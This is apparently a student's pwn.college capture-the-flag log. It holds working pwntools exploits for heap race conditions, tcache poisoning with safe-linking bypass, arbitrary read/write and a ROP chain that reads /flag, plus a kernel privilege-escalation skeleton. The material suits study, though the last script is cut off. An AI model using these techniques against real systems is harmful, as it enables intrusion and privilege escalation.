#include <unistd.h>
#include <sys/ioctl.h>
#include <sys/sendfile.h>
#include <string.h>
char *shellcode="...";
int len = 264;
struct anonym{
    char buf[256];
    void* addr /* =? */;
}test;

int main(){
    memcpy(test.buf, shellcode, 256);
    test.addr = (void*)...;
    int fd = open("/proc/pwncollege", 2);
    write(fd, &test, 264);
    //after privilege escalation
    int fd2 = open("/flag", O_RDONLY);
    sendfile(1, fd2, NULL, 60);
}

level10

I cannot figure out the difference between this and previous level…..

level11

there is a userland program with a seccomp constraint (only write is allowed).

and the pwncollege proc entry cannot be read by the user hacker. we can use write to do the privilege escalation.

level12

first fork a child to read the flag into bss segment, then delete the flag.
Next read shellcode which can only use write syscall.
the shellcode use write() to communicate with pwncollege kernel module for privilege escalation purpose.
then use write() to print out the bss segment content.

module E-advance

key point:

Core concept: security checks that do not properly use mutexes are ineffective in a multithreaded environment!
keep track of what you know about the process and the program, what you need to know, and what you can do.
Problem: we lack knowledge of:
- PIE base (binary address)
- ASLR base (library addresses)
- Stack base
- Heap base
- Canary
may be a plan:
1. Leak address of tcache_perthread_struct.
2. Compute address of pointer to main_arena.
3. Leak address of main_arena in libc’s BSS.
4. Compute libc base address.
5. Compute a thread stack address.
6. Leak the canary and overflow the stack or Overwrite the return address with a ropchain!
first: heap base, via tcache poisoning.
- use the race condition shown in the video, interleave free with write.
When the previous work is done, we have one address in the per-thread tcache memory. then by inspecting it in gdb we can find the main_arena pointer in the same memory region. Then we have all threads' heap metadata + the libc base address.
Exploit Primitives:
- the building block of complex exploitation:
  arbitrary read, arbitrary write, arbitrary call. or controlled ones.
- the slides demonstrate an exp example of multithread message storing service.
- use wrapped code for reuse intention.
- some gotchas:
  - corrupted heap metadata: start a new connection
  - burned bridges(pointer to not a valid heap chunk): avoid newly non-viable code paths.
kernel race:
- syscalls, file access, interrupts can be triggered simultaneously.
- prevention and recent situation in SLIDES

Pivoting Around Memory

four major parts:
- The program itself
- The stack
- libc
- The heap
Stack from libc: __libc_argv or environ
- the environ variable is just a pointer to the env on the stack set up by the _start() function (maybe).
  and the setenv() function allocates a chunk on the heap for the new string. this function also copies all the env strings' pointers (to the stack) to the heap, and adds the new env pointer to the end.
- setenv() copies the string, and putenv() refers to it.
libc from binary: reading GOT entries
Program base from libc: pivoting through ld
- libc always contains pointers into ld for runtime symbol resolution (in the form of the _dl_runtime_resolve libc GOT entry)
- ld is also practically guaranteed to be at a constant offset from libc
- Either way, once the address of ld has been leaked, the name field of the global _dl_rtld_libname struct holds a pointer into the .interp section of the main binary

e.g.

import time
import pwn
import os

def leak_perthread_addr(r1,r2):
    if os.fork() == 0:
        for _ in range(10000):
            #the AAAAAAAABBBBBBBB payload is a detail too; it was the culprit that kept me stuck until past 1 a.m.
            r1.sendline(b"malloc 0 scanf 0 AAAAAAAABBBBBBBB free 0")
        os.kill(os.getpid(), 9)
    for _ in range(10000):
        r2.sendline(b"printf 0")
    os.wait()
    output = r2.clean()
    r1.clean()
    leak = pwn.u64(next(a for a in output.split() if b'\x7f' in a)[8:].ljust(8, b'\0'))
    return leak

idx = 1
#just as the name says, malloc a chunk at the specific address.
def controlled_allocation(r1,r2,addr):
    global idx
    r1.clean()
    r2.clean()

    packed = pwn.p64(addr)
    r1.sendline(f"malloc {idx+1}".encode())
    while True:
        if os.fork() == 0:
            r1.sendline(f"free {idx}".encode())
            os.kill(os.getpid(), 9)
        r2.send((b"scanf %d " % idx + packed + b"\n") * 2000)
        os.wait()
        time.sleep(0.1)
        #use the printf command to check whether the race was won (printed content == packed).
        r1.sendline(f"malloc {idx} printf {idx}".encode())
        r1.readuntil(b"MESSAGE:")
        stored = r1.readline()[:-1]
        #there may be a \0 in the packed address. if the condition is true, the race succeeded.
        if stored == packed.split(b'\0')[0]:
            break
    r1.sendline(f"malloc {idx+1}".encode())
    r1.clean()
    idx += 2

def arbitrary_read(r1,r2,addr):
    controlled_allocation(r1,r2,addr)
    r1.sendline(f"printf {idx-1}".encode())
    r1.readuntil(b"MESSAGE:")
    output = r1.readline()[:-1]
    leak = pwn.u64(output[:8].ljust(8, b'\0'))
    return leak

def arbitrary_write(r1,r2,addr,value):
    controlled_allocation(r1,r2,addr)
    r1.send(b"scanf %d " % (idx-1) + value + b"\n")

try:
    p.kill()
except Exception:
    pass

p=pwn.process( "./ult")
#pwn.gdb.attach(p, "continue\n")
#time.sleep(1)
print(open(f"/proc/{p.pid}/maps").read())
r1 =pwn.remote("localhost",1337)
r2 =pwn.remote("localhost",1337)
r3 =pwn.remote("localhost",1337)

perthread_leak = leak_perthread_addr(r1,r2);
print("LEAKED: PERTHREAD: ", hex(perthread_leak))
main_arena_ptr_address = perthread_leak - 0x8d0 + 0x890
print("COMPUTED: MAIN_ARENA_PTR: ", hex(main_arena_ptr_address))
main_arena_address = arbitrary_read(r1, r2, main_arena_ptr_address)
print("LEAKED: MAIN_ARENA: ", hex(main_arena_address))
libc_base = main_arena_address - 0x1ebb80
print("COMPUTED: LIBC_BASE: ", hex(libc_base))
#this is the return address of vuln in thread. thus the *stored* rip.
stored_rip_address = libc_base - 0x4138
print("COMPUTED: STORED_RIP_ADDRESS:", hex(stored_rip_address))
addr_in_binary = arbitrary_read(r1, r2, stored_rip_address)
print("LEAKED: ADDR IN BINARY:", hex(addr_in_binary))
bin_base = addr_in_binary - 0x172f
print("COMPUTED: BINARY BASE: ", hex(bin_base))

print("!!!!!! LET'S ROLLING !!!!!!")
#new technique
libc = p.elf.libc
libc.address = libc_base
pwn.context.arch = 'amd64'
rop = pwn.ROP(libc, badchars=b"\x09\x0a\x0b\x0c\x0d\x0e\x20")
rop.call("close", [3])  # needed for sendfile to work: the open() below then gets fd 3.
rop.call("read", [0, libc.bss(0x123), 42])
rop.call("open", [libc.bss(0x123), 0])
rop.call("sendfile", [1, 3, 0, 1024])
rop.call("exit", [42])

arbitrary_write(r1, r2, stored_rip_address, rop.chain())
r1.sendline(b"quit")
p.send(b"/flag\0")
print("LEAKED:", p.readall())
print("EXITED: ", p.poll())

finally, i come to the last module level.

level1

emmmmmm, i thought i have to write the script above by my own hand.

failed to test the above program in kali2021, maybe the source code of tcache has changed.

Ohhhhhh, i forgot that thread-local variables live in the high address space, so the tcache address contains '\x7f'.

we can get the constant offset of libc and thread tcache address(0x7f44ac0008d0):

#print the content of the chunk.
pwndbg> x/4gx 0x7f44ac000f20
0x7f44ac000f20: 0x00000007f44ac000      0x00007f44ac0008d0
0x7f44ac000f30: 0x0000000000000000      0x0000000000000000

we can notice that the first 8 bytes of the chunk are 0x00000007f44ac000, which is not a valid user-space address. that is because libc 2.33 uses a newer technique: the PROTECT_PTR macro.

/* Safe-Linking:
   Use randomness from ASLR (mmap_base) to protect single-linked lists
   of Fast-Bins and TCache.  That is, mask the "next" pointers of the
   lists' chunks, and also perform allocation alignment checks on them.
   This mechanism reduces the risk of pointer hijacking, as was done with
   Safe-Unlinking in the double-linked lists of Small-Bins.
   It assumes a minimum page size of 4096 bytes (12 bits).  Systems with
   larger pages provide less entropy, although the pointer mangling
   still works.  */
#define PROTECT_PTR(pos, ptr) \
  ((__typeof (ptr)) ((((size_t) pos) >> 12) ^ ((size_t) ptr)))
#define REVEAL_PTR(ptr)  PROTECT_PTR (&ptr, ptr)

static __always_inline void
tcache_put (mchunkptr chunk, size_t tc_idx)
{
  tcache_entry *e = (tcache_entry *) chunk2mem (chunk);

  /* Mark this chunk as "in the tcache" so the test in _int_free will
     detect a double free.  */
  e->key = tcache;
  //and one line difference in tcache_put()!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  e->next = PROTECT_PTR (&e->next, tcache->entries[tc_idx]);
  tcache->entries[tc_idx] = e;
  ++(tcache->counts[tc_idx]);
}

static __always_inline void *
tcache_get (size_t tc_idx)
{
  tcache_entry *e = tcache->entries[tc_idx];
  if (__glibc_unlikely (!aligned_OK (e)))
    malloc_printerr ("malloc(): unaligned tcache chunk detected");
  tcache->entries[tc_idx] = REVEAL_PTR (e->next);
  --(tcache->counts[tc_idx]);
  e->key = NULL;
  return (void *) e;
}
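
The two macros above are easy to mirror in Python to check the dump by hand. This is a sketch, not glibc code: protect_ptr and reveal_ptr are hypothetical names, and it assumes the bin was empty when the chunk was freed (next == NULL), which is consistent with the x/4gx output.

```python
def protect_ptr(pos, ptr):
    """PROTECT_PTR: XOR the pointer with (address it is stored at >> 12)."""
    return (pos >> 12) ^ ptr

def reveal_ptr(pos, stored):
    """REVEAL_PTR applies the same XOR, so it undoes protect_ptr."""
    return protect_ptr(pos, stored)

entry_addr = 0x7f44ac000f20          # where e->next lives, from the x/4gx dump
stored = protect_ptr(entry_addr, 0)  # assumption: next was NULL
print(hex(stored))

# Round trip with an arbitrary (made-up) next pointer in the same heap.
example_next = 0x7f44ac001340
assert reveal_ptr(entry_addr, protect_ptr(entry_addr, example_next)) == example_next
```

Since a NULL next pointer is stored as the bare shifted address, one leaked entry from an empty bin is enough to recover the heap page.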

the server is using libc-2.31, which matches with ubuntu20.04. and this version doesn’t have PROTECT_PTR macro.

the result on my kali2021 is:

#this is the tcache next pointer (the mangled value shifted left by 12 bits)
pwndbg> vmmap 0x00000007f44ac000000
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
    0x7f44ac000000     0x7f44ac021000 rw-p    21000 0      [heap 3:1] +0x0
#this is tcache struct	
pwndbg> vmmap 0x00007f44ac0008d0
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
    0x7f44ac000000     0x7f44ac021000 rw-p    21000 0      [heap 3:1] +0x8d0

we continue to check the content at address 0x00007f44ac0008d0 to look for a libc-based address, which is what we want.

by x/512gx 0x00007f44ac0008d0, we can find useful addresses in a higher region than the heap. just take one, and use the offsets among known addresses to calculate more addresses.

Okay, the beginning of the heap stores some information containing a pointer to main_arena. so we should use x/512gx 0x00007f44ac000000, which is the page-aligned version of the previous one.

then we can find this:

in founded address:
/*0x7f055c000880: 0x0000000000000000      0x0000000000000000*/     
# 0x7f055c000890: 0x00007f0563ef5ba0      0x0000000000000000      
/*0x7f055c0008a0: 0x0000000000000001      0x0000000000021000*/
and in maps:
/*  0x7f0563d38000     0x7f0563d5e000 r--p    26000 0      /usr/lib/x86_64-linux-gnu/libc-2.33.so
    0x7f0563d5e000     0x7f0563ea6000 r-xp   148000 26000  /usr/lib/x86_64-linux-gnu/libc-2.33.so
    0x7f0563ea6000     0x7f0563ef1000 r--p    4b000 16e000 /usr/lib/x86_64-linux-gnu/libc-2.33.so
    0x7f0563ef1000     0x7f0563ef2000 ---p     1000 1b9000 /usr/lib/x86_64-linux-gnu/libc-2.33.so*/
#   0x7f0563ef2000     0x7f0563ef5000 r--p     3000 1b9000 /usr/lib/x86_64-linux-gnu/libc-2.33.so
/*  0x7f0563ef5000     0x7f0563ef8000 rw-p     3000 1bc000 /usr/lib/x86_64-linux-gnu/libc-2.33.so*/

These two are perfectly matched. and now we find the main_arena’s address.
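
The offset between the leaked pointer and the libc base follows directly from the two dumps above. A small Python sketch of that arithmetic, where libc_base_from_leak is a hypothetical helper and the resulting offset only holds for this particular libc-2.33 build:

```python
leaked_ptr = 0x7f0563ef5ba0  # value found at heap offset 0x890
libc_start = 0x7f0563d38000  # first libc mapping in the maps output
rw_start, rw_end = 0x7f0563ef5000, 0x7f0563ef8000  # the rw-p libc mapping

# The pointer must fall inside libc's writable mapping.
assert rw_start <= leaked_ptr < rw_end

offset = leaked_ptr - libc_start
print(hex(offset))

def libc_base_from_leak(ptr, off=offset):
    """Recover the libc base from a leak of the same pointer in another run."""
    return ptr - off
```

The constant is tied to the libc build, so it has to be measured again against whatever libc the target uses.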

level1

the additional command is send_flag, which calls load_secret() and strcmp() to check whether the pwd is correct. the answer is a randomized string that takes the flag as the seed, so it won't change between runs.

in this level, the pwd is stored into bss segment in main function.

Thinking process:

we must leak the pwd through arbitrary read, and before the read we should also get the stack pointer of some stack frame.

and the secret_correct’s stack frame base is a constant offset by libc base which is 0x4640 in my kali2021. the pwd is stored in ebp-0x20, and the length is 16 bytes.

but secret_correct() has stack reuse protection: memset(s2, 0, 0x11uLL) to set pwd string to NULL.

emmmm………………….. should i try a race to read pwd before he clears out the PWD s2? I think not.

I can change the return address of challenge() to win() after using quit command. by using the function’s ebp i can easily locate it.

or, in this level, main function puts the pwd into 0x405655, where we can directly read out from.

wtf, when i try to read the main_arena_addr, the value stored there begins with '\x0a', which means '\n' and will stop printf from printing the rest of the chars.
pwndbg> x/8bx 0x00007fbc88000890
0x7fbc88000890: 0xa0 0x9b 0x1a 0x8f 0xbc 0x7f 0x00 0x00

Okay, that's because i used recvline, which stops at the newline.

so we should use r1.clean() to receive the message.

why would the printf print out the null bytes?????? Im so confused.

ohhhh, i think i get the point. before printf prints a string, it determines the string length by locating the null byte, and then it calls the write syscall to print that many bytes (which by then may include null bytes). in the race condition, with the previously filled AAAAAAAABBBBBBBB, after the length check passes, the other thread is scheduled and runs free. then the 'string' contains a tcache_perthread_struct pointer, and the write syscall prints it out directly.

~~but we can’t read the null byte in, nor the white characters~~.we can scanf null bytes into the buffer. the scanf simply adds a \0 to the end of the string, without checking whether there are null bytes in it . what a surprise.

Again, i forgot that the libc version on my kali is 2.33. i was stuck on why tcache poisoning didn't work, having neglected the PROTECT_PTR macro.

but i figured out that chunk 0 is at a constant offset from the tcache_perthread_struct address, which is 0x650. the tcache link at the end of controlled_allocation is like this: tcache_entry[i]->chunk_0->packed address

all we need is the target address and the chunk 0 address (now we have it), and then we perform the calculation like this: packed = (chunk_0_addr >> 12) ^ target_addr.

but the second time using arbitrary read it says: malloc(): unaligned tcache chunk detected. that's because the target 0x405655 is not 16-byte aligned, as required on x86-64. however, using 0x405650 as the string start address runs into the problem that it starts with null bytes.
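
The alignment problem is quick to check in Python. This is a sketch assuming a 16-byte malloc alignment on x86-64; aligned_ok and align_down are hypothetical helpers that mimic what the aligned_OK test checks, not glibc code.

```python
MALLOC_ALIGNMENT = 16  # assumption: 2 * sizeof(size_t) on x86-64

def aligned_ok(addr):
    """True when addr would pass the tcache alignment check."""
    return addr & (MALLOC_ALIGNMENT - 1) == 0

def align_down(addr):
    """Nearest aligned address at or below addr."""
    return addr & ~(MALLOC_ALIGNMENT - 1)

secret = 0x405655
base = align_down(secret)
print(aligned_ok(secret), hex(base), secret - base)
```

The nearest address malloc accepts is 5 bytes before the secret, and those 5 bytes are the null bytes that cut a printf-based read short.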

pwndbg> x/21bc 0x405650
0x405650 <secret+80>:   0 '\0' 0 '\0' 0 '\0' 0 '\0' 0 '\0' 109 'm' 108 'l' 116 't'
0x405658 <secret+88>:   122 'z' 102 'f' 118 'v' 114 'r' 102 'f' 113 'q' 103 'g' 106 'j'
0x405660 <secret+96>:   120 'x' 118 'v' 107 'k' 112 'p' 101 'e'

so we could use arbitrary_write() to change address stored in message[2], and ~~only need to change the last byte~~. scanf will read in null byte, so it needs full address to be packed.

finally, i use this plan(as follows). change the message’s content to another place where we want to overwrite.

r1.sendline(b'malloc 2') #make sure it exists.
arbitrary_write(r1, r2, 0x405220+0x10, 0x405655)
r1.sendline(b'printf 2') #print it out.
r1.recvuntil(b'MESSAGE: ')
pwd = r1.clean() #finally we get the pwd.
print("PWD : ", pwd)
r1.sendline(b'send_flag '+pwd)

full exp:

import time
import pwn
import os
def leak_perthread_addr(r1,r2):
    if os.fork()==0:
        r1.sendline(b"malloc 0 scanf 0 AAAAAAAABBBBBBBB free 0 "*10000)
        exit()
    r2.sendline(b"printf 0 "*10000)
    os.wait()
    time.sleep(0.5)
    output = r2.clean()
    r1.clean()
    leak = next(a for a in output.split() if b'\x7f' in a)[8:].ljust(8,b'\0')
    r1.sendline(b'malloc 0')
    return pwn.u64(leak)

perthread_leak = 0   
idx = 1
def controlled_allocation(r1, r2, addr, idx_=None):
    global idx
    if idx_ is None: #hmm, this seems to be of little use.
        idx_ = idx
    global perthread_leak
    chunk_0_addr = perthread_leak + 0x650
    chunk_idx_addr = perthread_leak + 0x650 + 0x410*idx
        
    packed = pwn.p64( (chunk_0_addr>>12)^addr )
    r1.clean(),r2.clean()
    r1.sendline(f'malloc {idx_}')
    r1.sendline(f'free {idx_}')

    while True:
        #after pass scanf check -> free it -> then overwrite tcache next pointer
        if os.fork() == 0:
            r1.sendline(f'free 0'.encode())
            os.kill(os.getpid(), 9)
            
        r2.send((b'scanf 0 ' + packed + b'\n')*2000)
        os.wait()
        time.sleep(0.1)
        r1.sendline(b'malloc 0 printf 0')
        r1.recvuntil(b'MESSAGE: ')
        output = r1.recvline()[:-1]
        if output == packed.split(b'\0')[0]:
            print(b'OUTPUT: ' + output + b' PACKED: ', packed.split(b'\0'))
            break
    #malloc the controlled chunk
    r1.sendline(f'malloc {idx_}')
    idx = idx_ + 1
    
#support 8 bytes read
def arbitrary_read(r1, r2, addr, idx_=None):
    global idx
    if idx_ is None: #hmm, this seems to be of little use.
        idx_ = idx
    controlled_allocation(r1, r2, addr, idx_)
    r1.sendline(f'printf {idx_-1}')
    r1.recvuntil(b'MESSAGE: ')
    output = r1.clean()
    print('MESSAGE IS: ', output)
    return output
    
#support digital write
def arbitrary_write(r1, r2, addr, value):
    global idx
    controlled_allocation(r1, r2, addr)
    #i forgot to set context.binary here, so it defaulted to the i386 architecture and packed value as 4 bytes
    r1.sendline(b'scanf %d '%(idx-1) + pwn.flat([value]))

try:
    p.kill(),r1.close(),r2.close()
except Exception:
    pass
pwn.context.log_level='info'
pwn.context.binary = './toddlertwo_level1.0.elf64'
p=pwn.process("./toddlertwo_level1.0.elf64")
print(open(f"/proc/{p.pid}/maps" ).read())
r1 =pwn.remote("localhost",1337)
r2 =pwn.remote("localhost",1337)

perthread_leak = leak_perthread_addr(r1,r2);
print("LEAKED: PERTHREAD: ", hex(perthread_leak))
#main_arena_ptr_address = perthread_leak - 0x8d0 + 0x890
#pwn.gdb.attach(p, "b *challenge+0x19b\nb *challenge+0x302\ninit-pwndbg\nc\n")
#main_arena_addr = pwn.u64(arbitrary_read(r1, r2, main_arena_ptr_address)[:-1].ljust(8, b'\0'))
#print("MAIN ARENA ADDR: ", hex(main_arena_addr))
#pwn.gdb.attach(p, "b challenge+0x10b\ninit-pwndbg\nc\n")
#libc_base = main_arena_addr - 0x1bdba0
#print('LIBC BASE: ', hex(libc_base))
#secretCorrect_frame_base = libc_base - 0x4640
#print("SECRET FRAME BASE: ", hex(secretCorrect_frame_base))
#pwn.gdb.attach(p, "b *challenge+0x19b\nb *challenge+0x302\ninit-pwndbg\nc\n")
#arbitrary_read(r1, r2, 0x405650, 2)
r1.sendline(b'malloc 2')
arbitrary_write(r1, r2, 0x405220+0x10, 0x405655)
r1.sendline(b'printf 2')
r1.recvuntil(b'MESSAGE: ')
pwd = r1.clean()
print("PWD : ", pwd)
r1.sendline(b'send_flag '+pwd)
print(next(a for a in r1.clean().split(b'\n') if b'flag{' in a))
pwn.gdb.attach(p, "init-pwndbg\n")

there is no difference between .0 and .1 level.

level2

protections are all turned on.

there is no load_secret() function in main, so the last resort may be rewriting the return address of challenge().

for test:

p/d (int[15])stored
p/x (char*[15])messages

it’s so hard to do with libc-2.33. the memory align check is annoying. just assuming that the binary base is already known.

fail exp:

import time
import pwn
import os
def leak_perthread_addr(r1,r2):
    if os.fork()==0:
        r1.sendline(b"malloc 0 scanf 0 AAAAAAAABBBBBBBB free 0 "*10000)
        exit()
    r2.sendline(b"printf 0 "*10000)
    os.wait()
    time.sleep(0.01)
    output = r2.clean()
    r1.clean()
    leak = next(a for a in output.split() if b'\x7f' in a)[8:].ljust(8,b'\0')
    r1.sendline(b'malloc 0')
    return pwn.u64(leak)

perthread_leak = 0   
idx = 1
def controlled_allocation(r1, r2, addr):
    global idx
    global perthread_leak
    chunk_0_addr = perthread_leak + 0x650
        
    packed = pwn.p64( (chunk_0_addr>>12)^addr )
    r1.clean(),r2.clean()
    r1.sendline(f'malloc {idx}')
    r1.sendline(f'free {idx}')

    while True:
        #after pass scanf check -> free it -> then overwrite tcache next pointer
        if os.fork() == 0:
            r1.sendline(f'free 0'.encode())
            os.kill(os.getpid(), 9)
            
        r2.send((b'scanf 0 ' + packed + b'\n')*2000)
        os.wait()
        time.sleep(0.1)
        r1.sendline(b'malloc 0 printf 0')
        output = b''
        r1.recvuntil(b'MESSAGE: ')
        output = r1.recvline()[:-1]
        if output == packed.split(b'\0')[0]:
            print(b'OUTPUT: ' + output + b' PACKED: ', packed.split(b'\0'))
            break
    #malloc the controlled chunk
    r1.sendline(f'malloc {idx}'.encode())
    idx += 1
    
#support 8 bytes read
def arbitrary_read(r1, r2, addr, unalign=False):
    global idx
    if unalign:
        r1.sendline(b'malloc 10')
        arbitrary_write(r1, r2, binary_base+0x5040+0x8*10, addr)
        r1.sendline(b'printf 10')
    else:
        controlled_allocation(r1, r2, addr)
        r1.sendline(f'printf {idx-1}'.encode())
    r1.recvuntil(b'MESSAGE: ')
    output = r1.clean()
    print('MESSAGE IS: ', output)
    pwn.context.log_level = 'info'
    return output
    
#support digital write
def arbitrary_write(r1, r2, addr, value, unalign=False):
    global idx
    if unalign:
        r1.sendline(b'malloc 10')
        arbitrary_write(r1, r2, binary_base+0x5040+0x8*10, addr)
        r1.sendline(b'scanf 10 ' + value[0].to_bytes(8, 'little'))
        return
    controlled_allocation(r1, r2, addr)
    r1.sendline(b'scanf %d '%(idx-1) + pwn.flat(value))

try:
    p.kill(),r1.close(),r2.close()
except Exception:
    pass
pwn.context.log_level='info'
pwn.context.binary = './toddlertwo_level2.0.elf64'
p=pwn.process("./toddlertwo_level2.0.elf64")
p.clean()
with open(f"/proc/{p.pid}/maps") as f:
    print(f.read())
r1 =pwn.remote("localhost",1337)
r2 =pwn.remote("localhost",1337)

perthread_leak = leak_perthread_addr(r1,r2);
print("LEAKED: PERTHREAD: ", hex(perthread_leak))
main_arena_ptr_address = perthread_leak - 0x8d0 + 0x890
time.sleep(0.2)
main_arena_addr = pwn.u64(arbitrary_read(r1, r2, main_arena_ptr_address)[:-1].ljust(8, b'\0'))
print("MAIN ARENA ADDR: ", hex(main_arena_addr))
libc_base = main_arena_addr - 0x1bdba0
print('LIBC BASE: ', hex(libc_base))
stored_rip_addr = main_arena_addr - 0x1c1d78
print('STORED RIP ADDR: ', hex(stored_rip_addr))
#stored_rip = pwn.u64(arbitrary_read(r1, r2, stored_rip_addr, True)[:-1].ljust(8, b'\0'))
#print('STORED RIP: ', stored_rip)
binary_base = 0
with open(f"/proc/{p.pid}/maps") as f: 
    binary_base = int(f.read(12), 16)
print('BINARY BASE: ', hex(binary_base))
#LET'S ROLLING
win_addr = binary_base + 0x1778
arbitrary_write(r1, r2, stored_rip_addr, [win_addr], True)
r1.sendline(b'quit')
p.clean()
print(r1.clean().decode())

level3

a hint from the code:

fwrite("Storing the secret in this thread's stack.\n", 1uLL, 0x2BuLL, (FILE *)__readfsqword(0xFFFFFFF8));
load_secret(&v5);

so it’s quite easy, just need to locate the challenge’s frame base.

the stored_rip_addr is at a constant offset from the challenge’s frame base.

level4

nothing special

level5

The secret is stored in the environment by setenv(). env is pointed to by environ in libc. i need to have a look at that blog to learn how to dig into the ld library. let me add a new section in key points.

the distance between libc_base and ld_base is 0x1df000 bytes. the secret is stored in the main thread's heap.

plan:

wrong start:

~~First, read out the binary base (on Kali the only way I can do that is by cheating…)~~

~~Locate the env string in the heap and read it out.~~

After reading out main_arena's base, read its top field, which points to the top chunk of the main thread's heap, near the binary. It doesn't change while the child threads receive and process commands.
Next, find the distance between the top chunk and the secret's address. This is also a constant.
Read out the secret.
Then use the send_flag command.
~~Or just change the return address of challenge.~~
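The first plan can be sketched roughly as below. This is only an illustration under assumptions: `read8` stands for any 8-byte read primitive (such as the `arbitrary_read` helper in these notes), `TOP_FIELD_OFFSET = 0x60` is the usual position of `top` in `struct malloc_state` on x86-64 glibc and should be confirmed in gdb for the target libc, and `secret_delta` is a hypothetical constant measured once in a debugger.

```python
import struct

# Assumed offset of the `top` field inside glibc's `struct malloc_state`
# on x86-64; confirm with `p &main_arena.top` in gdb for the target libc.
TOP_FIELD_OFFSET = 0x60

def locate_secret(read8, main_arena_addr, secret_delta):
    """Return the secret's address using an 8-byte read primitive.

    read8(addr) must return 8 raw bytes read from addr.
    secret_delta is the signed, constant distance from the top chunk to
    the secret (hypothetical: measure it once in gdb).
    """
    raw = read8(main_arena_addr + TOP_FIELD_OFFSET)
    top_chunk = struct.unpack("<Q", raw)[0]
    return top_chunk + secret_delta

# Stand-in memory so the sketch runs without a live target.
FAKE_ARENA = 0x7F0000001000
fake_memory = {FAKE_ARENA + TOP_FIELD_OFFSET: struct.pack("<Q", 0x55550000A000)}

def fake_read8(addr):
    return fake_memory[addr]

secret_addr = locate_secret(fake_read8, FAKE_ARENA, -0x1234)
print(hex(secret_addr))
```

Against the real target, `read8` would wrap the leak primitive and strip or pad its output to exactly 8 bytes before unpacking.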

exp(the second method):

import time
import pwn
import os
def leak_perthread_addr(r1,r2):
    if os.fork()==0:
        r1.sendline(b"malloc 0 scanf 0 AAAAAAAABBBBBBBB free 0 "*10000)
        exit()
    r2.sendline(b"printf 0 "*10000)
    os.wait()
    time.sleep(0.01)
    output = r2.clean()
    r1.clean()
    leak = next(a for a in output.split() if b'\x7f' in a)[8:].ljust(8,b'\0')
    r1.sendline(b'malloc 0')
    return pwn.u64(leak)

perthread_leak = 0   
idx = 1
def controlled_allocation(r1, r2, addr):
    global idx
    global perthread_leak
    chunk_0_addr = perthread_leak + 0x650
        
    packed = pwn.p64( (chunk_0_addr>>12)^addr )
    r1.clean(),r2.clean()
    r1.sendline(f'malloc {idx}'.encode())
    r1.sendline(f'free {idx}'.encode())

    while True:
        #after pass scanf check -> free it -> then overwrite tcache next pointer
        if os.fork() == 0:
            r1.sendline(f'free 0'.encode())
            os.kill(os.getpid(), 9)
            
        r2.send((b'scanf 0 ' + packed + b'\n')*2000)
        os.wait()
        time.sleep(0.1)
        r1.sendline(b'malloc 0 printf 0')
        output = b''
        r1.recvuntil(b'MESSAGE: ')
        output = r1.recvline()[:-1]
        if output == packed.split(b'\0')[0]:
            print(b'OUTPUT: ' + output + b' PACKED: ', packed.split(b'\0'))
            break
    #malloc the controlled chunk
    r1.sendline(f'malloc {idx}'.encode())
    idx += 1
    
#support 8 bytes read
def arbitrary_read(r1, r2, addr, unalign=False):
    global idx
    if unalign:
        r1.sendline(b'malloc 10')
        arbitrary_write(r1, r2, binary_base+0x5040+0x8*10, addr)
        r1.sendline(b'printf 10')
    else:
        controlled_allocation(r1, r2, addr)
        r1.sendline(f'printf {idx-1}'.encode())
    r1.recvuntil(b'MESSAGE: ')
    output = r1.clean()
    print('MESSAGE IS: ', output)
    pwn.context.log_level = 'info'
    return output
    
#support digital write
def arbitrary_write(r1, r2, addr, value, unalign=False):
    global idx
    if unalign:
        r1.sendline(b'malloc 10')
        arbitrary_write(r1, r2, binary_base+0x5040+0x8*10, addr)
        r1.sendline(b'scanf 10 ' + value[0].to_bytes(8, 'little'))
        return
    controlled_allocation(r1, r2, addr)
    r1.sendline(b'scanf %d '%(idx-1) + pwn.flat(value))

try:
    p.kill(),r1.close(),r2.close()
except Exception:
    pass
pwn.context.log_level='info'
pwn.context.binary = './toddlertwo_level2.0.elf64'
p=pwn.process("./toddlertwo_level2.0.elf64")
p.clean()
with open(f"/proc/{p.pid}/maps") as f:
    print(f.read())
r1 =pwn.remote("localhost",1337)
r2 =pwn.remote("localhost",1337)

perthread_leak = leak_perthread_addr(r1,r2);
print("LEAKED: PERTHREAD: ", hex(perthread_leak))
main_arena_ptr_address = perthread_leak - 0x8d0 + 0x890
time.sleep(0.2)
main_arena_addr = pwn.u64(arbitrary_read(r1, r2, main_arena_ptr_address)[:-1].ljust(8, b'\0'))
print("MAIN ARENA ADDR: ", hex(main_arena_addr))
libc_base = main_arena_addr - 0x1bdba0
print('LIBC BASE: ', hex(libc_base))
stored_rip_addr = main_arena_addr - 0x1c1d78
print('STORED RIP ADDR: ', hex(stored_rip_addr))
#stored_rip = pwn.u64(arbitrary_read(r1, r2, stored_rip_addr, True)[:-1].ljust(8, b'\0'))
#print('STORED RIP: ', stored_rip)
binary_base = 0
with open(f"/proc/{p.pid}/maps") as f: 
    binary_base = int(f.read(12), 16)
print('BINARY BASE: ', hex(binary_base))
#LET'S ROLLING
win_addr = binary_base + 0x1798
arbitrary_write(r1, r2, stored_rip_addr, [win_addr], True)
r1.sendline(b'quit')
p.clean()
print(r1.clean().decode())
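The `packed` value built in `controlled_allocation` above is a safe-linking mangled pointer: newer glibc versions store a tcache `next` pointer XORed with the address of its own slot shifted right by 12. A minimal standalone sketch of that arithmetic follows; the function names and addresses are made up for illustration, and the alignment remark is my understanding of why the script needs a separate `unalign` path.

```python
import struct

def protect_ptr(slot_addr, target):
    """Mangle `target` the way safe-linking stores it at `slot_addr`."""
    return (slot_addr >> 12) ^ target

def reveal_ptr(slot_addr, mangled):
    """Undo the mangling; XOR with the same key is its own inverse."""
    return (slot_addr >> 12) ^ mangled

# Hypothetical addresses, only to show the round trip.
chunk_0_addr = 0x7F1234560650   # where the freed chunk's next pointer lives
target_addr = 0x7F1234567890    # where the next malloc should land

mangled = protect_ptr(chunk_0_addr, target_addr)
packed = struct.pack("<Q", mangled)  # bytes to write over the next pointer

print(hex(mangled))
print(hex(reveal_ptr(chunk_0_addr, mangled)))

# Assumption: glibc aborts on tcache entries that are not 16-byte aligned,
# so misaligned targets need a different route.
print(target_addr % 16 == 0)
```

Because the key depends on the slot address, the heap leak (`perthread_leak`) has to come first; without it the mangled value cannot be computed.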

level6

The secret is stored in the main thread's heap.

What is the difference from the previous one?

level7

There is no send_flag command and no win() function.

import time
import pwn
import os
def leak_perthread_addr(r1,r2):
    if os.fork()==0:
